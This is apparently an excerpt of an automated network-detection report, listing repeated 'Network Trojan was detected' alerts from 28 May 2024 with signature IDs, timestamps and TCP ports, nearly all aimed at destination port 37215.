            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842078
            SID:2829579
            Source Port:50170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634406
            SID:2829579
            Source Port:52364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658113
            SID:2829579
            Source Port:47094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847296
            SID:2835222
            Source Port:39712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507578
            SID:2835222
            Source Port:35216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762158
            SID:2835222
            Source Port:55274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990131
            SID:2829579
            Source Port:59080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309162
            SID:2829579
            Source Port:42732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899607
            SID:2835222
            Source Port:56206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910478
            SID:2835222
            Source Port:35978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.404090
            SID:2835222
            Source Port:34482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755726
            SID:2829579
            Source Port:58562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357738
            SID:2835222
            Source Port:42008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759973
            SID:2835222
            Source Port:46514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952575
            SID:2829579
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.384717
            SID:2829579
            Source Port:59040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.815698
            SID:2835222
            Source Port:56352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855380
            SID:2829579
            Source Port:38828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918301
            SID:2835222
            Source Port:53912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014849
            SID:2835222
            Source Port:47926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816936
            SID:2835222
            Source Port:51248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757506
            SID:2835222
            Source Port:40952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.294093
            SID:2829579
            Source Port:54320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019274
            SID:2829579
            Source Port:38406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730418
            SID:2829579
            Source Port:36100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482918
            SID:2829579
            Source Port:54888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878792
            SID:2835222
            Source Port:36006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742359
            SID:2829579
            Source Port:56736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807523
            SID:2829579
            Source Port:36390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815089
            SID:2829579
            Source Port:44974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004763
            SID:2829579
            Source Port:46942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320038
            SID:2829579
            Source Port:51692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.065217
            SID:2829579
            Source Port:40766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.603990
            SID:2829579
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559976
            SID:2835222
            Source Port:40872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.463493
            SID:2835222
            Source Port:45018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376605
            SID:2835222
            Source Port:58984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852925
            SID:2829579
            Source Port:57892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743139
            SID:2835222
            Source Port:39680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.075743
            SID:2835222
            Source Port:59034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.440516
            SID:2835222
            Source Port:56566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317094
            SID:2829579
            Source Port:37716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425140
            SID:2829579
            Source Port:51966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.952029
            SID:2835222
            Source Port:58362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936922
            SID:2835222
            Source Port:51110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748115
            SID:2829579
            Source Port:49504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.896811
            SID:2835222
            Source Port:37096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383586
            SID:2829579
            Source Port:39562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014680
            SID:2835222
            Source Port:39798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299262
            SID:2829579
            Source Port:53106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506675
            SID:2829579
            Source Port:42140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.942773
            SID:2829579
            Source Port:41518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954522
            SID:2829579
            Source Port:60916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.035578
            SID:2835222
            Source Port:34408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643807
            SID:2829579
            Source Port:44526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563840
            SID:2835222
            Source Port:50662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040311
            SID:2835222
            Source Port:45032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.910102
            SID:2835222
            Source Port:48402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.431283
            SID:2829579
            Source Port:42758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552766
            SID:2835222
            Source Port:42084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850384
            SID:2829579
            Source Port:60868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575437
            SID:2829579
            Source Port:40308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821906
            SID:2835222
            Source Port:37216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802110
            SID:2829579
            Source Port:53176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.770544
            SID:2835222
            Source Port:60088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957110
            SID:2835222
            Source Port:43616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893305
            SID:2835222
            Source Port:40688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879585
            SID:2829579
            Source Port:47280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932003
            SID:2829579
            Source Port:38726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261099
            SID:2835222
            Source Port:52318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855672
            SID:2829579
            Source Port:43062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.842341
            SID:2835222
            Source Port:50422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914202
            SID:2835222
            Source Port:53148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738809
            SID:2835222
            Source Port:40774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644118
            SID:2835222
            Source Port:59760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298388
            SID:2835222
            Source Port:53030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755691
            SID:2835222
            Source Port:37792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053976
            SID:2835222
            Source Port:41968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814183
            SID:2829579
            Source Port:51574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710051
            SID:2829579
            Source Port:60376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.206583
            SID:2835222
            Source Port:34912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048090
            SID:2829579
            Source Port:51026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928228
            SID:2835222
            Source Port:48146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039409
            SID:2829579
            Source Port:43924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712248
            SID:2829579
            Source Port:50802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969789
            SID:2835222
            Source Port:54130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507669
            SID:2835222
            Source Port:37084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459954
            SID:2829579
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326635
            SID:2829579
            Source Port:59348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623391
            SID:2829579
            Source Port:39280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.590709
            SID:2835222
            Source Port:53282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273453
            SID:2835222
            Source Port:54218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435779
            SID:2835222
            Source Port:58880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.602336
            SID:2829579
            Source Port:38564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039318
            SID:2829579
            Source Port:42398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933896
            SID:2829579
            Source Port:38638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767298
            SID:2829579
            Source Port:33458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875201
            SID:2829579
            Source Port:37682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854001
            SID:2829579
            Source Port:48362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935072
            SID:2835222
            Source Port:33410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026034
            SID:2829579
            Source Port:34460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543962
            SID:2829579
            Source Port:49568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919659
            SID:2829579
            Source Port:37686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.525082
            SID:2829579
            Source Port:53906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084489
            SID:2829579
            Source Port:52274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757838
            SID:2829579
            Source Port:39934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.487200
            SID:2835222
            Source Port:53360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943331
            SID:2835222
            Source Port:37512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929626
            SID:2835222
            Source Port:41808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020708
            SID:2829579
            Source Port:58014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987174
            SID:2829579
            Source Port:40092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508366
            SID:2835222
            Source Port:59164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626418
            SID:2829579
            Source Port:43592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026589
            SID:2835222
            Source Port:50234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336421
            SID:2829579
            Source Port:44262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344311
            SID:2835222
            Source Port:60974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046456
            SID:2835222
            Source Port:59084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887528
            SID:2835222
            Source Port:55408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.191212
            SID:2829579
            Source Port:59456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279785
            SID:2829579
            Source Port:49940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.719046
            SID:2835222
            Source Port:35650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810636
            SID:2829579
            Source Port:43544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059940
            SID:2829579
            Source Port:48124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326785
            SID:2829579
            Source Port:51884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853895
            SID:2835222
            Source Port:43000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915231
            SID:2835222
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881262
            SID:2829579
            Source Port:36794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.782065
            SID:2829579
            Source Port:59714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850604
            SID:2835222
            Source Port:47796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063400
            SID:2835222
            Source Port:32872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001372
            SID:2829579
            Source Port:48174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746925
            SID:2835222
            Source Port:37068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063428
            SID:2835222
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.998904
            SID:2835222
            Source Port:34828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605109
            SID:2829579
            Source Port:35726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968003
            SID:2835222
            Source Port:36102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887419
            SID:2829579
            Source Port:39642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396349
            SID:2829579
            Source Port:53420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310928
            SID:2829579
            Source Port:58586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773165
            SID:2835222
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873190
            SID:2829579
            Source Port:45048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862953
            SID:2829579
            Source Port:48150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648735
            SID:2829579
            Source Port:60236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441497
            SID:2829579
            Source Port:50052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681848
            SID:2829579
            Source Port:45758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825415
            SID:2835222
            Source Port:53752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712262
            SID:2835222
            Source Port:58332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349832
            SID:2835222
            Source Port:56768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772927
            SID:2829579
            Source Port:36682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.583890
            SID:2835222
            Source Port:51780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909041
            SID:2829579
            Source Port:34670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928944
            SID:2835222
            Source Port:59262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885230
            SID:2829579
            Source Port:46544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618069
            SID:2829579
            Source Port:53268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994781
            SID:2835222
            Source Port:52778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.806409
            SID:2835222
            Source Port:33170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879588
            SID:2835222
            Source Port:45310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939212
            SID:2835222
            Source Port:43562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388784
            SID:2835222
            Source Port:36950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917582
            SID:2835222
            Source Port:37898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414550
            SID:2835222
            Source Port:55254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780117
            SID:2829579
            Source Port:36092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774675
            SID:2829579
            Source Port:58410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.488036
            SID:2835222
            Source Port:40106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291098
            SID:2835222
            Source Port:56866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827428
            SID:2829579
            Source Port:60496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935107
            SID:2835222
            Source Port:33202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542260
            SID:2829579
            Source Port:41592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356840
            SID:2835222
            Source Port:38528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861808
            SID:2829579
            Source Port:35952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772080
            SID:2829579
            Source Port:42050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026607
            SID:2829579
            Source Port:60958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620131
            SID:2835222
            Source Port:52820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760009
            SID:2829579
            Source Port:59972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387360
            SID:2835222
            Source Port:43032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723412
            SID:2835222
            Source Port:47520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739932
            SID:2835222
            Source Port:55330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722302
            SID:2829579
            Source Port:57652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682048
            SID:2835222
            Source Port:60320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698164
            SID:2835222
            Source Port:50702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021119
            SID:2835222
            Source Port:45852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809547
            SID:2829579
            Source Port:50702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587322
            SID:2829579
            Source Port:50848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026397
            SID:2835222
            Source Port:51326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885428
            SID:2835222
            Source Port:40670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334159
            SID:2835222
            Source Port:49086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767322
            SID:2829579
            Source Port:41036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.065891
            SID:2829579
            Source Port:58986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436456
            SID:2835222
            Source Port:46142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.759186
            SID:2829579
            Source Port:59968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871259
            SID:2835222
            Source Port:54994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343586
            SID:2835222
            Source Port:59378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605007
            SID:2829579
            Source Port:48338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910125
            SID:2829579
            Source Port:56936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712081
            SID:2835222
            Source Port:46060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676489
            SID:2835222
            Source Port:52642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.719130
            SID:2835222
            Source Port:35986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
